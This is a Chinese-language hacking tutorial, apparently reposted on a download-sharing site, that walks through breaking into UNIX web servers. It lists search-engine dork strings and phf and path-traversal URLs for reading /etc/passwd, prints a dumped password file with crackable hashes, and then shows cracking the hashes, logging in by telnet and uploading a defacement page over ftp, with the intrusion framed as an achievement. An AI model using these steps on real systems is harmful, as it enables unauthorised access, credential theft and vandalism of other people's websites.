给大家带来的是UNIX系统的phf漏洞的攻击方法配合密码强攻来获取系统的最高权限。首先,我们连上Internet,打开红客的网络扫描器:www.google.com (随着google公司对这个搜索引擎的性能的不断提高,到现在可以说扫描一些远程URL漏洞是轻而易举,甚至连信用卡用户的资料都能扫描得到。), Q9750406我们用Google来搜索下列代码:
/cgi-bin/phf?Qalias=x
less /etc/passwd
/cgi-bin/phf.cgi?/etc/passwd
/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
刷的一下,几百个具备这个条件的资料被搜索出来了,真正有这个漏洞的网站并不多,呵呵,我居然找到了几个能用的:
http://www.hehe.com/cgi-bin/php.cgi?/etc/passwd
root:abcdefghijklmn:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-1:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
shan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash
www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash
test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bash
fax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash
women:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash
kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash
coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash
bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash
carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash
haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash
prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bash
tham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bash
ccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bash
sk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bash
services:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash
什么?不知道这个是什么?有没有搞错!这个就是UNIX系统的密码文档,这里面储存的都是用户账号和密码等资料。如:sk:UPrcTmnVSkd3w: 514:100:sk:/home/sk:/bin/bash 这一段代码就是一个账号为sk的用户的资料,UPrcTmnVSkd3w这个就是sk用户的密码,514是这个用户的用户标识,100是用户的组号,中间的sk表示的是用户的注释,/home/sk这个表示的是用户注册的目录,最后的/bin/bash是用户注册后系统执行的程序名。嘴唇都说干了,喝点 Coffee,呵呵!
我们在浏览器里打开了这个密码文件,然后我们把这个文件down下来,用小榕兄的乱刀来破解
。呵呵,设置好乱刀就开始run。没事情干了,呵呵,坐一边去聊天了,不多久,就看到一大排密码被破解出来了,呵呵,很有成就感。
现在我们用破解出来的账号进入系统:
telnet www.hehe.com
SUN OS 5.7
login: sk
passwd:xxxxxxx
#who(看看系统管理员在不在,安全起见)
sk(呵呵,只有我一个人在)
(这个用户居然是管理员级别的权限,呵呵,改掉他的主页!)
#ls
dev/ proc/ usr/ bin/ etc/ local/ root/
var/ boot/ home/ lost found/ sbin/
#cd home/www(通常web页面都是放在home/目录里的)
#ls
index.html main.html help.html ……
好,我们现在另开一个窗口,把做好的黑页用ftp传上来:
ftp www.hehe.com
ftp>put d:\\index.html
切回到原来的窗口,找到我们上传的index.html文件:
#find . -name “index.html”
index.html(呵呵,就在根目录下)
#cp index.html \\home\\www\\
呵呵,打开浏览器一看,修改成功!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » UNIX主机的入侵
常见问题FAQ
- 免费下载或者VIP会员专享资源能否直接商用?
- 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
- 织梦模板使用说明
- 你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html
